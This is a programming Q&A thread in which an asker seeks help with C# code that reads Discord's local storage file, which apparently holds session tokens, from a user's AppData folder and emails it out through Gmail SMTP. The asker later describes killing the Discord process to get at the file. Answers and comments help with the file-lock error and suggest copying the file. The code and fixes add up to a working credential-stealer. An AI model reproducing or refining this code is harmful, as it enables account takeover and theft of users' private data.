# The process cannot access the file because it is being used by another process possible fix

Tags: c#

So at the moment I am creating an application that is going to locally search for a file and upload and send it to my email. The issue I am having is in the process of "attempting" to send the file I get the issue of "The process cannot access the file because it is being used by another process"

My Code:

```
MailMessage DiscordExtra = new MailMessage();
SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com");
DiscordExtra.From = new MailAddress("your mail@gmail.com");
DiscordExtra.To.Add("to_mail@gmail.com");
DiscordExtra.Subject = "Test Mail - 1";
DiscordExtra.Body = "mail with attachment";

System.Net.Mail.Attachment attachment;
attachment = new System.Net.Mail.Attachment("C:\\Users/Feive/AppData/Roaming/discord/Local Storage/https_discordapp.com_0.localstorage");
DiscordExtra.Attachments.Add(attachment);

SmtpServer.Port = 587;
SmtpServer.Credentials = new System.Net.NetworkCredential(nsTextBox1.Text, nsTextBox2.Text);
SmtpServer.EnableSsl = true;

SmtpServer.Send(DiscordExtra);
```

Nstextbox1 is the email.
Nstextbox2 is the password to the email.
I need this to be able to upload this file and send it to the email. Does anyone have any idea of a fix for this. The discord process needs to stay running.

Answer (score 0):

make sure to free/dispose all held resources.

```
DiscordExtra.Dispose()
```

Comment: or wrap code in `using (MailMessage DiscordExtra = new MailMessage()) { }`

Comment: Doing this did not work I added "DiscordExtra.Dispose();" at the end of the code after "SmtpServer.Send(DiscordExtra);"

Comment: what do you mean by "didn't work"? write the exception

Comment: try DiscordExtra.Attachments.Dispose()

Comment: https://imgur.com/a/l85le That is not working either. Is there any way I can make the application copy that file and put it somewhere else then upload it?

Comment: I want to add this in as well the file is in use by the discord application.

Comment: I need to be able to do this while discord is running though.

Comment: maybe the file is hold by another process running the old version of your code?

Comment: probably you will need to copy the file. since another process from discord is using it and then access it with System.Net.Mail.Attachment

Comment: try moving a copy it to the current working directory or adding the copy as a resource

Comment: I found a fix for now. before everything I que'd to kill the discord process then send the file.

Answer (score -2):

Make sure, the file is not used by stuff like word, notepad etc. 
If you're processing the file in code, make sure to close the file, when it's done writing to it.

Comment: As long as discord is running it will be in use I need to find a way to be able to somehow copy that file and send it.

Comment: The issue is still NOT solved if anyone can provide help it is much appreciated.